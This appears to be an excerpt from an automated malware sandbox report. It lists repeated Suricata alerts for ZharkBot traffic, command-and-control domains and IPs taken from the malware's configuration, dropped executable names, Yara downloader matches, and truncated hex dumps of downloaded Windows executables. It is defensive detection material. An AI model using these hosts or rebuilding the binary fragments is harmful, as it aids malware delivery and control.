Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49852 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49897 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49862 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49886 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49911 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49913 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49921 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49916 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49903 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49961 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49959 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49889 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49923 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49937 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49933 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49931 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49955 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49948 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49970 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49905 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49976 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49953 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49942 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49965 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49950 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49986 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50014 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49894 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50007 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50011 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50017 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49973 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49981 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49928 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49967 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49908 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49997 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49999 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49978 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50003 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49872 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50019 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50023 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49940 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50037 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50035 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50041 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50043 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50044 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50046 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50057 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50060 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50052 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50039 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49944 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49992 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50064 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50067 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50070 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50077 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50111 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49989 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50085 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50025 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50094 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50049 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50073 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50009 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50100 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50108 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50113 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50120 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49994 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50159 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50082 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50096 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50068 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50166 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50075 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50138 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50134 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50122 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50126 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50178 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50031 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50141 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50186 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50196 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50055 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50161 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50118 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50028 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50088 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50164 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50157 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50116 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50131 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49900 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50106 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50136 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50188 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50151 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50124 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50191 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50194 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50098 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50091 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50144 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50180 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50155 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50103 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50184 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50147 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50169 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50171 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50021 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49857 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50193 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50149 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49864 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49881 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50175 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50027 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49892 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49918 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49926 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50062 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50080 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:50129 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: exonic-hacks.com
Source: Malware configuration extractor	IPs: 185.215.113.19
Source: Malware configuration extractor	URLs: 185.208.158.139:27667

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: loli.exe.2.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: googleupdats.exe.2.dr

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.4:49760 -> 185.208.158.114:1256
Source: global traffic	TCP traffic: 192.168.2.4:49790 -> 185.216.214.225:1920
Source: global traffic	TCP traffic: 192.168.2.4:49797 -> 185.196.10.120:4442
Source: global traffic	TCP traffic: 192.168.2.4:49835 -> 161.35.34.195:3333

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 31 Aug 2024 20:42:02 GMTContent-Type: application/octet-streamContent-Length: 327168Last-Modified: Wed, 07 Aug 2024 22:38:53 GMTConnection: keep-aliveETag: "66b3f77d-4fe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 82 0a 9e b7 c6 6b f0 e4 c6 6b f0 e4 c6 6b f0 e4 d2 00 f3 e5 cb 6b f0 e4 d2 00 f5 e5 68 6b f0 e4 d2 00 f4 e5 d0 6b f0 e4 d2 00 f6 e5 c7 6b f0 e4 94 1e f4 e5 d7 6b f0 e4 94 1e f3 e5 d2 6b f0 e4 94 1e f5 e5 95 6b f0 e4 d2 00 f1 e5 d7 6b f0 e4 c6 6b f1 e4 7c 6b f0 e4 0c 1e f5 e5 cf 6b f0 e4 0c 1e f2 e5 c7 6b f0 e4 52 69 63 68 c6 6b f0 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a9 47 a0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 b8 03 00 00 52 01 00 00 00 00 00 4b 00 02 00 00 10 00 00 00 d0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 c8 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 c0 29 00 00 9c a3 04 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 a3 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b7 03 00 00 10 00 00 00 b8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 03 01 00 00 d0 03 00 00 04 01 00 00 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 22 00 00 00 e0 04 00 00 14 00 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 c0 29 00 00 00 10 05 00 00 2a 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 31 Aug 2024 20:42:11 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 08 Aug 2024 03:39:14 GMTETag: "17800-61f23c5420f4f"Accept-Ranges: bytesContent-Length: 96256Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a6 3d b4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 08 00 00 00 00 00 00 2e 8d 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 8c 01 00 4f 00 00 00 00 a0 01 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 6d 01 00 00 20 00 00 00 6e 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ce 04 00 00 00 a0 01 00 00 06 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8d 01 00 00 00 00 00 48 00 00 00 02 00 05 00 94 67 00 00 48 25 01 00 01 00 00 00 26 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 18 00 00 0a 2a 1a 72 01 00 00 70 2a 1a 20 8d 98 98 04 2a 1e 02 28 19 00 00 0a 2a 1a 72 43 00 00 70 2a a6 73 1a 00 00 0a 80 01 00 00 04 73 1b 00 00 0a 80 02 00 00 04 73 1c 00 00 0a 80 03 00 00 04 73 1d 00 00 0a 80 04 00 00 04 2a 1a 72 67 00 00 70 2a 1a 20 67 f6 68 05 2a 1a 72 cb 00 00 70 2a 1a 20 72 e2 f3 04 2a 1a 72 2f 01 00 70 2a 1a 20 f5 a1 be 01 2a 1a 72 93 01 00 70 2a 1a 20 2a 70 7b 01 2a 1a 72 f7 01 00 70 2a 1a 20 dc e2 3f 04 2a 1e 02 28 28 00 00 0a 2a 1a 72 89 05 00 70 2a 1a 20 f0 df bf 01 2a 1a 72 ed 05 00 70 2a 1a 20 53 08 dd 04 2a c2 28 2b 00 00 06 2d 07 28 2c 00 00 06 2c 02 2b 07 28 2d 00 00 06 2c 02 2b 07 28 2a 00 00 06 2c 02 2b 07 28 29 00 00 06 2c 06 14 28 5a 00 00 0a 2a 22 28 cb 